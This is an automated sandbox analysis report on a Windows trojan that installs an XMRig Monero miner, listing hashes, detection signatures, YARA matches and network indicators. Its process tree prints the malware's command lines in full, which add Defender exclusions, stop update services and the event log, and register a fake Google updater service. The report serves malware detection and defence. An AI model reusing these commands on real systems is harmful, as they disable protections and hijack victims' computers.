Windows Analysis Report
TwrhjEKqxk.exe

Overview

General Information

Sample name: TwrhjEKqxk.exe (renamed because the original name is a hash value)
Original sample name: dbf8d8ef015846d4078466a7c1d3f41c.exe
Analysis ID: 1527556
MD5: dbf8d8ef015846d4078466a7c1d3f41c
SHA1: 67d156457e6028addc00cdd3a2e595d7c7a00466
SHA256: d50ecb2fa3afee2d23f9f952201e01898e191e9d475f44bc1c146c49c4efe4bb
Tags: 64 exe trojan

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • TwrhjEKqxk.exe (PID: 4748 cmdline: "C:\Users\user\Desktop\TwrhjEKqxk.exe" MD5: DBF8D8EF015846D4078466A7C1D3F41C)
    • powershell.exe (PID: 4404 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2516 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 2200 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 1088 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5804 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5560 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1576 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3652 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6448 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5908 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6304 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 432 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2436 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2200 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1276 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5804 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 3620 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: DBF8D8EF015846D4078466A7C1D3F41C)
    • powershell.exe (PID: 3168 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6416 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6516 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 432 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6184 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6348 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1276 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2136 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4124 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6448 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5356 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4752 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 6476 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 6448 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
0000003B.00000003.2189751609.0000000001118000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000003B.00000003.2189751609.0000000001109000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000003B.00000002.4507671698.0000000001118000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
(list truncated in this extract; the full report lists 11 entries)
Source | Rule | Description | Author | Strings
34.3.updater.exe.2166ee40000.2.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
34.3.updater.exe.2166ee40000.2.raw.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x36fe08:$a1: mining.set_target
  • 0x362030:$a2: XMRIG_HOSTNAME
  • 0x3649a8:$a3: Usage: xmrig [OPTIONS]
  • 0x362008:$a4: XMRIG_VERSION
34.3.updater.exe.2166ee40000.2.raw.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x3b5561:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
34.3.updater.exe.2166ee40000.2.raw.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x3b5dd8:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3b9400:$s3: \\.\WinRing0_
  • 0x366fa8:$s4: pool_wallet
  • 0x3613d8:$s5: cryptonight
  • 0x3613e8:$s5: cryptonight
  • 0x3613f8:$s5: cryptonight
  • 0x361408:$s5: cryptonight
  • 0x361420:$s5: cryptonight
  • 0x361430:$s5: cryptonight
  • 0x361440:$s5: cryptonight
  • 0x361458:$s5: cryptonight
  • 0x361468:$s5: cryptonight
  • 0x361480:$s5: cryptonight
  • 0x361498:$s5: cryptonight
  • 0x3614a8:$s5: cryptonight
  • 0x3614b8:$s5: cryptonight
  • 0x3614c8:$s5: cryptonight
  • 0x3614e0:$s5: cryptonight
  • 0x3614f8:$s5: cryptonight
  • 0x361508:$s5: cryptonight
  • 0x361518:$s5: cryptonight
34.3.updater.exe.2166ee40000.2.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
(list truncated in this extract; the full report lists 3 further entries)

Change of critical system settings

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6448, ProcessName: powercfg.exe

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 4404, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 4404, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 2200, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 4404, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 6448, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 1276, ProcessName: sc.exe
No Suricata rule has matched


AV Detection

Source: TwrhjEKqxk.exe | Avira: detected
Source: C:\ProgramData\Google\Chrome\updater.exe | Avira: detection malicious, Label: HEUR/AGEN.1362845
Source: xmr-eu1.nanopool.org | Virustotal: Detection: 5%
Source: C:\ProgramData\Google\Chrome\updater.exe | ReversingLabs: Detection: 55%
Source: C:\ProgramData\Google\Chrome\updater.exe | Virustotal: Detection: 45%
Source: TwrhjEKqxk.exe | ReversingLabs: Detection: 55%
Source: TwrhjEKqxk.exe | Virustotal: Detection: 45%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Source: Yara match | File source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000003B.00000003.2189751609.0000000001118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000003.2189751609.0000000001109000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000002.4507671698.0000000001118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000003.3457810885.0000000001118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000002.4507448971.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: updater.exe PID: 3620, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6476, type: MEMORYSTR
Source: unknown | DNS query: name: xmr-eu1.nanopool.org
Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: cryptonight/0
Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: TwrhjEKqxk.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! | source: TwrhjEKqxk.exe, 00000000.00000002.2150017772.00007FF7A0107000.00000040.00000001.01000000.00000003.sdmp, updater.exe, 00000022.00000002.2192775271.00007FF7DA2D7000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.dr
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb | source: TwrhjEKqxk.exe, 00000000.00000002.2150017772.00007FF7A0107000.00000040.00000001.01000000.00000003.sdmp, updater.exe, 00000022.00000002.2192775271.00007FF7DA2D7000.00000040.00000001.01000000.00000004.sdmp

Networking

Source: C:\Windows\explorer.exe | Network Connect: 162.19.224.121 10343
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 162.19.224.121:10343
Source: Joe Sandbox View | ASN Name: CENTURYLINK-US-LEGACY-QWESTUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: explorer.exe, 0000003B.00000003.3457810885.000000000111B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000111B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000112D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crln
Source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
